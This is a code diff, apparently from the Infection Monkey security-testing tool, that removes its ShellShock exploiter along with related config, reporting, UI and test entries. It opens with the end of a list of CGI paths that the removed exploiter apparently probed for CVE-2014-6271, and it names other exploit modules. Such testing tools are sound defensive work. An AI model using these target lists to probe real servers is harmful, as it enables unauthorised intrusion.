r"/webtools/bonsai/ccvsblame.cgi",
r"/webtools/bonsai/cvsblame.cgi",
r"/webtools/bonsai/cvslog.cgi",
r"/webtools/bonsai/cvsquery.cgi",
r"/webtools/bonsai/cvsqueryform.cgi",
r"/webtools/bonsai/showcheckins.cgi",
r"/wwwadmin.cgi",
r"/wwwboard.cgi",
r"/wwwboard/wwwboard.cgi",
)

1
monkey/monkey_island/cc/services/config_schema/basic.py
View File

@ -18,7 +18,6 @@ BASIC = {
"WmiExploiter",
"SSHExploiter",
"Log4ShellExploiter",
"ShellShockExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",

10
monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
View File

@ -53,16 +53,6 @@ EXPLOITER_CLASSES = {
"link": "https://www.guardicore.com/infectionmonkey/docs/reference"
"/exploiters/sshexec/",
},
{
"type": "string",
"enum": ["ShellShockExploiter"],
"title": "ShellShock Exploiter",
"safe": True,
"info": "CVE-2014-6271, based on logic from "
"https://github.com/nccgroup/shocker/blob/master/shocker.py .",
"link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters"
"/shellshock/",
},
{
"type": "string",
"enum": ["ElasticGroovyExploiter"],

18
monkey/monkey_island/cc/services/reporting/aws_exporter.py
View File

@ -68,7 +68,6 @@ class AWSExporter(Exporter):
CredentialType.PASSWORD.value: AWSExporter._handle_ssh_issue,
CredentialType.KEY.value: AWSExporter._handle_ssh_key_issue,
},
ExploiterDescriptorEnum.SHELLSHOCK.value.class_name: AWSExporter._handle_shellshock_issue, # noqa:E501
"tunnel": AWSExporter._handle_tunnel_issue,
ExploiterDescriptorEnum.ELASTIC.value.class_name: AWSExporter._handle_elastic_issue,
ExploiterDescriptorEnum.SMB.value.class_name: {
@ -295,23 +294,6 @@ class AWSExporter(Exporter):
instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_shellshock_issue(issue, instance_arn):
return AWSExporter._build_generic_finding(
severity=10,
title="Machines are vulnerable to 'Shellshock'",
description="Update your Bash to a ShellShock-patched version.",
recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. "
"The attack was made possible because the HTTP server running on "
"TCP port {2} was vulnerable to a "
"shell injection attack on the paths: {3}.".format(
issue["machine"], issue["ip_address"], issue["port"], issue["paths"]
),
instance_arn=instance_arn,
instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
)
@staticmethod
def _handle_smb_password_issue(issue, instance_arn):

6
monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
View File

@ -11,9 +11,6 @@ from monkey_island.cc.services.reporting.issue_processing.exploit_processing.pro
from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.log4shell import ( # noqa: E501
Log4ShellProcessor,
)
from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.shellshock_exploit import ( # noqa: E501
ShellShockExploitProcessor,
)
from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.zerologon import ( # noqa: E501
ZerologonExploitProcessor,
)
@ -34,9 +31,6 @@ class ExploiterDescriptorEnum(Enum):
ELASTIC = ExploiterDescriptor(
"ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor
)
SHELLSHOCK = ExploiterDescriptor(
"ShellShockExploiter", "ShellShock Exploiter", ShellShockExploitProcessor
)
STRUTS2 = ExploiterDescriptor("Struts2Exploiter", "Struts2 Exploiter", ExploitProcessor)
WEBLOGIC = ExploiterDescriptor(
"WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor

15
monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/processors/shellshock_exploit.py
View File

@ -1,15 +0,0 @@
from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ( # noqa: E501
ExploiterReportInfo,
ExploitProcessor,
)
class ShellShockExploitProcessor:
@staticmethod
def get_exploit_info_by_dict(class_name: str, exploit_dict: dict) -> ExploiterReportInfo:
exploit_info = ExploitProcessor.get_exploit_info_by_dict(class_name, exploit_dict)
urls = exploit_dict["data"]["info"]["vulnerable_urls"]
exploit_info.port = urls[0].split(":")[2].split("/")[0]
exploit_info.paths = ["/" + url.split(":")[2].split("/")[1] for url in urls]
return exploit_info

6
monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js
View File

@ -28,7 +28,6 @@ import {drupalIssueOverview, drupalIssueReport} from './security/issues/DrupalIs
import {wmiPasswordIssueReport, wmiPthIssueReport} from './security/issues/WmiIssue';
import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues/SshIssue';
import {elasticIssueOverview, elasticIssueReport} from './security/issues/ElasticIssue';
import {shellShockIssueOverview, shellShockIssueReport} from './security/issues/ShellShockIssue';
import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue';
import {
crossSegmentIssueOverview,
@ -125,11 +124,6 @@ class ReportPageComponent extends AuthComponent {
[this.issueContentTypes.REPORT]: elasticIssueReport,
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
},
'ShellShockExploiter': {
[this.issueContentTypes.OVERVIEW]: shellShockIssueOverview,
[this.issueContentTypes.REPORT]: shellShockIssueReport,
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
},
'PowerShellExploiter': {
[this.issueContentTypes.OVERVIEW]: powershellIssueOverview,
[this.issueContentTypes.REPORT]: powershellIssueReport,

30
monkey/monkey_island/cc/ui/src/components/report-components/security/issues/ShellShockIssue.js
View File

@ -1,30 +0,0 @@
import React from 'react';
import CollapsibleWellComponent from '../CollapsibleWell';
export function shellShockIssueOverview() {
return (<li>Machines are vulnerable to Shellshock (<a
href="https://www.cvedetails.com/cve/CVE-2014-6271">CVE-2014-6271</a>).
</li>)
}
function getShellshockPathListBadges(paths) {
return paths.map(path => <span className="badge badge-warning" style={{margin: '2px'}} key={path}>{path}</span>);
}
export function shellShockIssueReport(issue) {
return (
<>
Update your Bash to a ShellShock-patched version.
<CollapsibleWellComponent>
The machine <span className="badge badge-primary">{issue.machine}</span> (<span
className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to a <span
className="badge badge-danger">ShellShock</span> attack.
<br/>
The attack was made possible because the HTTP server running on TCP port <span
className="badge badge-info">{issue.port}</span> was vulnerable to a shell injection attack on the
paths: {getShellshockPathListBadges(issue.paths)}.
</CollapsibleWellComponent>
</>
);
}

1
monkey/tests/data_for_tests/monkey_configs/flat_config.json
View File

@ -52,7 +52,6 @@
"SmbExploiter",
"WmiExploiter",
"SSHExploiter",
"ShellShockExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"ZerologonExploiter",

1
monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json
View File

@ -5,7 +5,6 @@
"SmbExploiter",
"WmiExploiter",
"SSHExploiter",
"ShellShockExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",

1
monkey/tests/unit_tests/monkey_island/cc/services/test_config.py
View File

@ -187,7 +187,6 @@ def test_format_config_for_agent__exploiters(flat_monkey_config):
{"name": "DrupalExploiter", "options": {}},
{"name": "ElasticGroovyExploiter", "options": {}},
{"name": "HadoopExploiter", "options": {}},
{"name": "ShellShockExploiter", "options": {}},
{"name": "Struts2Exploiter", "options": {}},
{"name": "WebLogicExploiter", "options": {}},
{"name": "ZerologonExploiter", "options": {}},

1
vulture_allowlist.py
View File

@ -57,7 +57,6 @@ password_restored # unused variable (monkey/monkey_island/cc/services/reporting
SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
ELASTIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:32)
SHELLSHOCK # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:36)
STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43)